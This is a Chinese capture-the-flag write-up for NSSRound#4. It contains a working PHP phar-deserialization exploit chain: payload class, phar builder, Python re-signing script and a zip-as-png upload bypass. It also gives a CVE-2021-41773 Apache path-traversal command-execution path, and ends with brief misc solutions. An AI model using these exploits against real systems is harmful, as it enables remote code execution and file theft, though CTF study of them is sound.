[NSSRound#4] 复现

Web

1zweb

1zweb(revenge)

ez_rce

Web

1zweb

直接能非预期读出来flag

1zweb(revenge)

就是上题的预期解

文件上传、反序列化、PHP伪协议

index.php


class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

file_get_content可以触发phar反序列化，只需绕过__wakeup即可


class LoveNss{
    public $ljt="Misc";
    public $dky="Re";
    public $cmd="system('cat /flag');";
}
 
$a = new LoveNss();
echo serialize($a);
 
# 下面这部分就没改
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub(""); //设置stub
 
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

由于需要绕过wakeup，因为是后面自己去改的数据，而phar文件的签名是第一次生成文件的时候自动生成的，所以当我们修改数据过后，由于签名错误，这个phar是无法被正常解析的，所以需要修改签名，让他变成一个正常的phar文件还需要对phar文件进行修改


from hashlib import sha1
 
file = open('poc.phar', 'rb').read() # 需要重新生成签名的phar文件
 
data = file[:-28] # 获取需要签名的数据
 
final = file[-8:] # 获取最后8位GBMB标识和签名类型
 
newfile = data+sha1(data).digest()+final # 数据 + 签名 + 类型 + GBMB
 
open('newpoc.phar', 'wb').write(newfile) # 写入到新的phar文件

upload.php


if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}

这里对文件后后缀进行了白名单，也对phar文件内容进行了检测，伪了绕过这两点

将文件压缩为zip文件，并把后缀改为png文件，这样文件内容和后缀白名单检测都绕过了

我们可以使用phar伪协议

file=phar://./upload/123.png/newpoc.phar

ez_rce

CVE-2021-41773

Apache2.4.49 有目录穿越漏洞

如果服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

这里制造了一个文件夹迷宫，四层（靠经验和尝试了）

集束炸弹爆破出路径四个变量都0~9

MISC

Signin

给了一个dockerfile

导入了一个hggg/flag:v0镜像，然后将镜像中FLAG环境变量的数据写入了flag.txt文件之中。
通过DockerHub查看镜像的细节：

在操作历史中，就可以看到对FLAG这个环境变量的操作历史

Pixel_Signin

提取像素点数据 31*31


from PIL import Image
result = open('1.txt','w+')
img = Image.open("Pixel_Signin.png")
img = img.convert('RGB')
for i in range(31):
    for j in range(31):
        r,g,b = img.getpixel((j,i))
        print(r,g,b,file=result)